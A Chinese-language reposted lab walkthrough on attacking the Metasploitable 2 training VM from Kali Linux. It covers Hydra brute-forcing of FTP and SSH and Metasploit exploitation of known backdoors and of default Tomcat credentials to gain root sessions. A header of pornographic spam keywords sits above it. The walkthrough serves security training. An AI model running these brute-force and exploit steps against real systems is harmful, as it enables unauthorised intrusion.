日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

kali渗透metasploitable靶机

發布時間:2023/12/19 综合教程 36 生活家
生活随笔 收集整理的這篇文章主要介紹了 kali渗透metasploitable靶机 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

系統簡介:

Metasploitable是一個虛擬機文件,從網上下載解壓之后就可以直接使用,無需安裝。

靶機下載鏈接:http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip

如何開始:

虛擬機設置完畢后,就可以登錄Metasploitable啦,用戶名是:msfadmin密碼是:msfadmin.

在shell中執行ifconfig命令來查看你的IP 地址.

開啟的服務

nmap 192.168.195.133

端口爆破:FTP、SSH等

工具:Hydra

備用字典

后面會用到tomcat 也可以加進去

將字典傳到桌面上

一、爆破FTP

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://192.168.195.133

二、爆破SSH

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.195.133 ssh

遠程連接進行測試

成功連接

三、端口滲透:

利用metasploit

然后在kali linux中進行滲透:

啟動msf msfconsole

端口1: 6667——-irc_3281_backdoor

登錄msf search irc 找到對應得模塊

進入對應模塊 查看配置 show options

設置主機名 進行漏洞利用 exploit 利用 ,

成功獲取會話,root權限

端口2 、6200——-vsftpd_234_backdoor

利用metasploit

找到利用模塊

切換模塊 查看配置

反彈會話,root權限

端口3、1524——-ingrelock_backdoor

利用telnet連接1524,直接返回root會話

端口4、1099——-distcc程序漏洞—-ingrelock

利用metasploit

返回對話

端口5、139——-samba為3.0漏洞

先用nmap進行詳細掃描

nmap -v -A -T4 192.168.195.133

metasploit有眾多掃描模塊,以適應不同的需要。在metasploit中同樣可以使用nmap進行掃描。在命令行中直接鍵入指令即可。

Samba

利用metasploit

端口6、8180——-Apache Tomcat弱口令

在終端中輸入命令“nmap –sV 192.168.195.133”,對目標主機進行端口掃描,發現開放8180端口并且運行著ApacheTomcat/CoyoteJSP engine1.1。
在終端中輸入命令“msfconsole”,啟動MSF終端。
在終端下輸入命令“search tomcat”, 搜索tomcat的相關工具和攻擊載荷。
在終端輸入“use auxiliary/scanner/http/tomcat_mgr_login”, 啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。
在終端下輸入“set RHOSTS 192.168.195.133”,設置攻擊目標主機IP。
在終端下輸入“set RPORT 8180”,設置攻擊目標主機端口號.
在終端下輸入“exploit”, 實施攻擊。獲得用戶名tomcat,密碼tomcat。
在終端下輸入“use exploit/multi/http/tomcat_mgr_deploy”, 啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。
在終端下輸入“set RHOST 192.168.195.133”,設置攻擊的目標主機IP。
在終端下輸入“set RPORT 8180”,設置攻擊的目標主機端口號。
在終端下輸入“set username tomcat”,設置攻擊時使用的登錄賬號tomcat。
在終端下輸入“set userpassword tomcat”,設置攻擊時使用的密碼tomcat。
在終端下輸入“exploit”,開始攻擊,建立會話。
在終端下輸入“getuid”,查看獲取的用戶權限。

在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發現開放8180端口并且運行著ApacheTomcat/CoyoteJSP engine1.1。

在終端下輸入命令“search tomcat”, 搜索tomcat的相關工具和攻擊載荷。
在終端輸入“use auxiliary/scanner/http/tomcat_mgr_login”, 啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。

use auxiliary/scanner/http/tomcat_mgr_login”, 啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。
set RHOSTS 192.168.1.3”,設置攻擊目標主機IP、 “set RPORT 8180”,設置攻擊目標主機端口號
在終端下輸入“exploit”, 實施攻擊。獲得用戶名tomcat,密碼tomcat。

使用use auxiliary/scanner/http/tomcat_mgr_login進行賬戶爆破

用默認自帶的字典即可,如果用桌面上字典 則需要設置set PASS_FILE 'root/Desktop/password.txt' & set USER_FILE 'root/Desktop/user.txt'

search tomcat ,

show options

在終端下輸入“set RHOST 192.168.195.133”,設置攻擊的目標主機IP。
在終端下輸入“set RPORT 8180”,設置攻擊的目標主機端口號。
在終端下輸入“set username tomcat”,設置攻擊時使用的登錄賬號tomcat。
在終端下輸入“set password tomcat”,設置攻擊時使用的密碼tomcat。
在終端下輸入“exploit”,開始攻擊,建立會話。

端口7、80——-PHP CGI參數注入執行漏洞

參考鏈接:

https://blog.csdn.net/weixin_42432317/article/details/90208213

https://blog.csdn.net/zxchhyg/article/details/70048140

總結

以上是生活随笔為你收集整理的kali渗透metasploitable靶机的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。